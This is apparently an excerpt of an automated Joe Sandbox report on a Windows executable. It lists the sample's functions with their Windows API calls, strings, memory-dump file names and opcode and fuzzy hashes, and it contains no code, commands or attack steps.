LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99

Function 00403F53 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02499760,00000000,00000000), ref: 0040445B
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554

Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(02499760,02499760,00002710), ref: 00402BE0

Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(02499760,02499760,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,02499760,02498968,00000000,00000000), ref: 00401E9B

SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,02499760,02498968,00000000,00000000,00000000), ref: 00404636

Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02499760), ref: 004054A5
Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D

Strings

pA, xrefs: 00404275

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
String ID: pA
API String ID: 2577741277-3402996844
Opcode ID: 5d668cb04b71de2f480a77bc2cc63b906295f5a7c4242ac04163e6f1321037e2
Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
Opcode Fuzzy Hash: 5d668cb04b71de2f480a77bc2cc63b906295f5a7c4242ac04163e6f1321037e2
Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A

Function 00403C83 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

PathQuoteSpacesW.SHLWAPI(00000000,00000000,024989E0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,024989E0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F

Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B

Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(02499760,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,02499760,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921

Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3

Strings

*pA, xrefs: 00403CFD
*pA, xrefs: 00403D5D

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
String ID: *pA$*pA
API String ID: 2955313036-2893952571
Opcode ID: 8d7ca3d34e552a4b3e4813a4e2a868de4bbf3c1973305ed030a1fd90886de301
Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
Opcode Fuzzy Hash: 8d7ca3d34e552a4b3e4813a4e2a868de4bbf3c1973305ed030a1fd90886de301
Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A

Function 00401BA0 Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: daa4a2f45eb59f3489035f7ac704f19fa2d9e105317b1c650053be6a57c9566a
Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
Opcode Fuzzy Hash: daa4a2f45eb59f3489035f7ac704f19fa2d9e105317b1c650053be6a57c9566a
Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E

Function 0040B6A0 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B712

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA

Function 0040E560 Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599
RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94

Function 0040AD45 Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 0040AD63
wcslen.MSVCRT ref: 0040AD75
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A

Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00408DFB
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
CoInitialize.OLE32(00000000), ref: 00408E1D

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95

Function 004099A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(02499760,02499760,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Strings

$0A, xrefs: 004099B4

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: EnvironmentVariable
String ID: $0A
API String ID: 1431749950-513306843
Opcode ID: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
Instruction ID: aa531fc2ff4271b490b4da26c39a2883f909eecf40e951fe565ba9eea3f0378e
Opcode Fuzzy Hash: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
Instruction Fuzzy Hash: 36C012B0204201ABD710CA04CD04B67BBE4EB50345F00C43EB184913B1C338CC40DB05

Function 0040B440 Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$AllocCreateEnterFileHeapLeave
String ID:
API String ID: 3705299215-0
Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8

Function 0040E266 Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
memset.MSVCRT ref: 0040E2D1

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5

Function 00401FBA Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402011
RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040201C

Part of subcall function 004053C1: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D1

Part of subcall function 00405430: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
Part of subcall function 00405430: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
Part of subcall function 00405430: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
String ID:
API String ID: 1205394408-0
Opcode ID: 80bbef749e469d8075b69d7c5fbc03918b8729a07b9c497950af765b831500ca
Instruction ID: d40c1fb095c70f871a48011b079aac708deae745ba771cefaa1841cdafdcac49
Opcode Fuzzy Hash: 80bbef749e469d8075b69d7c5fbc03918b8729a07b9c497950af765b831500ca
Instruction Fuzzy Hash: 72F0C034454604ABCA117B72FC82D5B3E6AEB1434CB05893EF544700B2CF3A5869AA5E

Function 0040AE39 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,02499760,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
DeleteFileW.KERNELBASE(00000000,0040AE72,02499760,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A

Function 0040E4D0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02490000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02490000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
